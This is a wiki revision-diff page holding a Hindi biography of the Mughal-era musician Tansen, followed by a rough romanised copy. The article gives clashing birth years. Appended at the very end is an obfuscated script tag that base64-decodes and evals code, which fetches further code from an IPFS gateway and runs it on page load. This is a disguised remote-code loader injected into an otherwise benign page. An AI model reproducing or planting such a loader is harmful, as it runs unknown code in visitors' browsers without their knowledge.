Difference between revisions of "तानसेन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " खां " to " ख़ाँ ")
Line 3: Line 3:
 
भारतीय संगीत के प्रसिद्ध गायक तानसेन का जन्म सन 1504 से 1509 ई. के बीच ग्वालियर से लगभग 45 किलोमीटर दूर ग्राम बेहट में [[ग्वालियर]] के तत्कालीन प्रसिद्ध फ़क़ीर हजरत [[मुहम्मद गौस]] के वरदान स्वरूप हुआ था। कहते है कि श्री मकरंद पांडे के कई संताने हुई, लेकिन एक पर एक अकाल ही काल कवलित होती चली गईं। इससे निराश और व्यथित श्री मकरंद पांडे सूफी संत मुहम्मद गौस की शरण में गये और उनकी दुआ से सन 1486 में तन्ना उर्फ तनसुख उर्फ त्रिलोचन का जन्म हुआ, जो आगे चलकर तानसेन के नाम से विख्यात हुआ। उनके पिता मकरंद पांडेय संगीत के अच्छे ज्ञाता थे। कहते हैं, तानसेन ने संगीत की शिक्षा स्वामी हरिदास से ली थी। किंतु यह संदेहास्पद है क्योंकि स्वामी जी केवल ब्रह्मचारीयों को ही शिष्य बनाते थे। संभव है कभी उन्होंने कुछ रागों के बारे में तानसेन से भी चर्चा की हो। तानसेन के मधुर कंठ और गायन शैली की ख्याति सुनकर 1562 ई. के लगभग अकबर ने उन्हें अपने दरबार में बुला लिया। अबुल फजल ने 'आइने अकबरी' में लिखा है कि अकबर ने जब पहली बार तानसेन का गाना सुना तो प्रसन्न होकर पुरस्कार में दो लाख टके दिए।  
 
भारतीय संगीत के प्रसिद्ध गायक तानसेन का जन्म सन 1504 से 1509 ई. के बीच ग्वालियर से लगभग 45 किलोमीटर दूर ग्राम बेहट में [[ग्वालियर]] के तत्कालीन प्रसिद्ध फ़क़ीर हजरत [[मुहम्मद गौस]] के वरदान स्वरूप हुआ था। कहते है कि श्री मकरंद पांडे के कई संताने हुई, लेकिन एक पर एक अकाल ही काल कवलित होती चली गईं। इससे निराश और व्यथित श्री मकरंद पांडे सूफी संत मुहम्मद गौस की शरण में गये और उनकी दुआ से सन 1486 में तन्ना उर्फ तनसुख उर्फ त्रिलोचन का जन्म हुआ, जो आगे चलकर तानसेन के नाम से विख्यात हुआ। उनके पिता मकरंद पांडेय संगीत के अच्छे ज्ञाता थे। कहते हैं, तानसेन ने संगीत की शिक्षा स्वामी हरिदास से ली थी। किंतु यह संदेहास्पद है क्योंकि स्वामी जी केवल ब्रह्मचारीयों को ही शिष्य बनाते थे। संभव है कभी उन्होंने कुछ रागों के बारे में तानसेन से भी चर्चा की हो। तानसेन के मधुर कंठ और गायन शैली की ख्याति सुनकर 1562 ई. के लगभग अकबर ने उन्हें अपने दरबार में बुला लिया। अबुल फजल ने 'आइने अकबरी' में लिखा है कि अकबर ने जब पहली बार तानसेन का गाना सुना तो प्रसन्न होकर पुरस्कार में दो लाख टके दिए।  
 
== शिक्षा दीक्षा==
 
== शिक्षा दीक्षा==
तानसेन के आरंभिक काल में ग्वालियर पर कलाप्रिय राजा [[मानसिंह तोमर]] का शासन था। उनके प्रोत्साहन से ग्वालियर संगीत कला का विख्यात केन्द्र था, जहाँ पर [[बैजूबावरा]], कर्ण और महमूद जैसे महान संगीताचार्य और गायक गण एकत्र थे, और इन्हीं के सहयोग से राजा मानसिंह तोमर ने संगीत की [[ध्रुपद]] गायकी का आविष्कार और प्रचार किया था। तानसेन की संगीत शिक्षा भी इसी वातावरण में हुई। राजा मानसिंह तोमर की मृत्यु होने और विक्रमाजीत से ग्वालियर का राज्याधिकार छिन जाने के कारण यहाँ के संगीतज्ञों की मंडली बिखरने लगी। तब तानसेन भी [[वृन्दावन]] चले गये और वहां उन्होंने [[हरिदास|स्वामी हरिदास]] जी से संगीत की उच्च शिक्षा प्राप्त की। संगीत शिक्षा में पारंगत होने के उपरांत तानसेन [[शेरशाह सूरी]] के पुत्र दौलत खां के आश्रय में रहे और फिर बांधवगढ़ (रीवा) के राजा रामचन्द्र के दरबारी गायक नियुक्त हुए।
+
तानसेन के आरंभिक काल में ग्वालियर पर कलाप्रिय राजा [[मानसिंह तोमर]] का शासन था। उनके प्रोत्साहन से ग्वालियर संगीत कला का विख्यात केन्द्र था, जहाँ पर [[बैजूबावरा]], कर्ण और महमूद जैसे महान संगीताचार्य और गायक गण एकत्र थे, और इन्हीं के सहयोग से राजा मानसिंह तोमर ने संगीत की [[ध्रुपद]] गायकी का आविष्कार और प्रचार किया था। तानसेन की संगीत शिक्षा भी इसी वातावरण में हुई। राजा मानसिंह तोमर की मृत्यु होने और विक्रमाजीत से ग्वालियर का राज्याधिकार छिन जाने के कारण यहाँ के संगीतज्ञों की मंडली बिखरने लगी। तब तानसेन भी [[वृन्दावन]] चले गये और वहां उन्होंने [[हरिदास|स्वामी हरिदास]] जी से संगीत की उच्च शिक्षा प्राप्त की। संगीत शिक्षा में पारंगत होने के उपरांत तानसेन [[शेरशाह सूरी]] के पुत्र दौलत ख़ाँ के आश्रय में रहे और फिर बांधवगढ़ (रीवा) के राजा रामचन्द्र के दरबारी गायक नियुक्त हुए।
 
== अकबर के नवरत्न  ==
 
== अकबर के नवरत्न  ==
 
अकबर के नवरत्नों तथा मुग़लकालीन संगीतकारों में तानसेन का नाम परम-प्रसिद्ध है। यद्धपि काव्य-रचना की दृष्टि से तानसेन का योगदान विशेष महत्त्वपूर्ण नहीं कहा जा सकता, परन्तु संगीत और काव्य के संयोग की दृष्टि से, जो भक्तिकालीन काव्य की एक बहुत बड़ी विशेषता थी, तानसेन साहित्य के इतिहास में अवश्य उल्लेखनीय हैं। तानसेन अकबर के नवरत्नों में से एक थे। एक बार अकबर ने उनसे कहा कि वो उनके गुरु का संगीत सुनना चाहते हैं। गुरु हरिदास तो अकबर के दरबार में आ नहीं सकते थे। लिहाजा इसी निधि वन में अकबर हरिदास का संगीत सुनने आए। हरिदास ने उन्हें कृष्ण भक्ति के कुछ भजन सुनाए थे। अकबर हरिदास से इतने प्रभावित हुए कि वापस जाकर उन्होंने तानसेन से अकेले में कहा कि आप तो अपने गुरु की तुलना में कहीं आस-पास भी नहीं है। फिर तानसेन ने जवाब दिया कि जहांपनाह हम इस ज़मीन के बादशाह के लिए गाते हैं और हमारे गुरु इस ब्रह्मांड के बादशाह के लिए गाते हैं तो फ़र्क़ तो होगा न।  
 
अकबर के नवरत्नों तथा मुग़लकालीन संगीतकारों में तानसेन का नाम परम-प्रसिद्ध है। यद्धपि काव्य-रचना की दृष्टि से तानसेन का योगदान विशेष महत्त्वपूर्ण नहीं कहा जा सकता, परन्तु संगीत और काव्य के संयोग की दृष्टि से, जो भक्तिकालीन काव्य की एक बहुत बड़ी विशेषता थी, तानसेन साहित्य के इतिहास में अवश्य उल्लेखनीय हैं। तानसेन अकबर के नवरत्नों में से एक थे। एक बार अकबर ने उनसे कहा कि वो उनके गुरु का संगीत सुनना चाहते हैं। गुरु हरिदास तो अकबर के दरबार में आ नहीं सकते थे। लिहाजा इसी निधि वन में अकबर हरिदास का संगीत सुनने आए। हरिदास ने उन्हें कृष्ण भक्ति के कुछ भजन सुनाए थे। अकबर हरिदास से इतने प्रभावित हुए कि वापस जाकर उन्होंने तानसेन से अकेले में कहा कि आप तो अपने गुरु की तुलना में कहीं आस-पास भी नहीं है। फिर तानसेन ने जवाब दिया कि जहांपनाह हम इस ज़मीन के बादशाह के लिए गाते हैं और हमारे गुरु इस ब्रह्मांड के बादशाह के लिए गाते हैं तो फ़र्क़ तो होगा न।  

Revision as of 13:27, 5 February 2011

tanasen
Tansen

sangit samrat tanasen ki nagari gvaliyar ke lie kahavat prasiddh hai ki yahaan bachche rote haian, to sur mean aur patthar lu dakate hai to tal mean. is nagari ne puratan kal se aj tak ek se badhakar ek sangit pratibhayean sangit sansar ko di haian aur sangit soory tanasen inamean sarvopari haian.

janm

bharatiy sangit ke prasiddh gayak tanasen ka janm san 1504 se 1509 ee. ke bich gvaliyar se lagabhag 45 kilomitar door gram behat mean gvaliyar ke tatkalin prasiddh faqir hajarat muhammad gaus ke varadan svaroop hua tha. kahate hai ki shri makarand paande ke kee santane huee, lekin ek par ek akal hi kal kavalit hoti chali geean. isase nirash aur vyathit shri makarand paande soophi sant muhammad gaus ki sharan mean gaye aur unaki dua se san 1486 mean tanna urph tanasukh urph trilochan ka janm hua, jo age chalakar tanasen ke nam se vikhyat hua. unake pita makarand paandey sangit ke achchhe jnata the. kahate haian, tanasen ne sangit ki shiksha svami haridas se li thi. kiantu yah sandehaspad hai kyoanki svami ji keval brahmachariyoan ko hi shishy banate the. sanbhav hai kabhi unhoanne kuchh ragoan ke bare mean tanasen se bhi charcha ki ho. tanasen ke madhur kanth aur gayan shaili ki khyati sunakar 1562 ee. ke lagabhag akabar ne unhean apane darabar mean bula liya. abul phajal ne 'aine akabari' mean likha hai ki akabar ne jab pahali bar tanasen ka gana suna to prasann hokar puraskar mean do lakh take die.

shiksha diksha

tanasen ke aranbhik kal mean gvaliyar par kalapriy raja manasianh tomar ka shasan tha. unake protsahan se gvaliyar sangit kala ka vikhyat kendr tha, jahaan par baijoobavara, karn aur mahamood jaise mahan sangitachary aur gayak gan ekatr the, aur inhian ke sahayog se raja manasianh tomar ne sangit ki dhrupad gayaki ka avishkar aur prachar kiya tha. tanasen ki sangit shiksha bhi isi vatavaran mean huee. raja manasianh tomar ki mrityu hone aur vikramajit se gvaliyar ka rajyadhikar chhin jane ke karan yahaan ke sangitajnoan ki mandali bikharane lagi. tab tanasen bhi vrindavan chale gaye aur vahaan unhoanne svami haridas ji se sangit ki uchch shiksha prapt ki. sangit shiksha mean parangat hone ke uparaant tanasen sherashah soori ke putr daulat khaan ke ashray mean rahe aur phir baandhavagadh (riva) ke raja ramachandr ke darabari gayak niyukt hue.

akabar ke navaratn

akabar ke navaratnoan tatha mugalakalin sangitakaroan mean tanasen ka nam param-prasiddh hai. yaddhapi kavy-rachana ki drishti se tanasen ka yogadan vishesh mahattvapoorn nahian kaha ja sakata, parantu sangit aur kavy ke sanyog ki drishti se, jo bhaktikalin kavy ki ek bahut b di visheshata thi, tanasen sahity ke itihas mean avashy ullekhaniy haian. tanasen akabar ke navaratnoan mean se ek the. ek bar akabar ne unase kaha ki vo unake guru ka sangit sunana chahate haian. guru haridas to akabar ke darabar mean a nahian sakate the. lihaja isi nidhi van mean akabar haridas ka sangit sunane ae. haridas ne unhean krishna bhakti ke kuchh bhajan sunae the. akabar haridas se itane prabhavit hue ki vapas jakar unhoanne tanasen se akele mean kaha ki ap to apane guru ki tulana mean kahian as-pas bhi nahian hai. phir tanasen ne javab diya ki jahaanpanah ham is zamin ke badashah ke lie gate haian aur hamare guru is brahmaand ke badashah ke lie gate haian to farq to hoga n.

rachanaean

tanasen ke nam ke sanbandh mean mataiky nahian hai. kuchh ka kahana hai ki 'tanasen' unaka nam nahian, unakoan mili upadhi thi. tanasen maulik kalakar the. ve svar-tal mean gitoan ki rachana bhi karate the. tanasen ke tin granthoan ka ullekh milata hai-

  1. 'sangitasar',
  2. 'ragamala' aur
  3. 'shriganesh stotr'.

mrityu

bharatiy sangit ke prasiddh gayak tanasen ki mrityu 1589 ee. mean huee. bharatiy sangit ke itihas mean dhrupadakar ke roop mean tanasen ka nam sadaiv amar rahega. isake sath hi brajabhasha ke pad sahity ka sangit ke sath jo atoot sambandh raha hai, usake sandarbh mean bhi tanasen chirasmaraniy raheange.

tika tippani aur sandarbh

(sahayak granth-

  1. sangitasamrat tanasen (jivani aur rachanaean): prabhudayal mital, sahity sansthan, mathura;
  2. hindi sahity ka itihas: pan. ramachandr shukl:
  3. akabari darabar ke hindi kabi: da. sarayoo prasad agraval.)

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>